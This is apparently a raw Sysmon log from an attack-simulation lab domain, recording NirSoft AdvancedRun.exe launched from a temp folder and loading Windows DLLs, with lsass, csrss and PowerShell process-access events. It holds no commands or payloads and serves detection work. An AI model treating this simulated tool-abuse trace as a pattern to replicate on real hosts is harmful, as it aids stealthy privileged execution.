18:44:23.742{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.742{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004011063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.711{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.711{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1d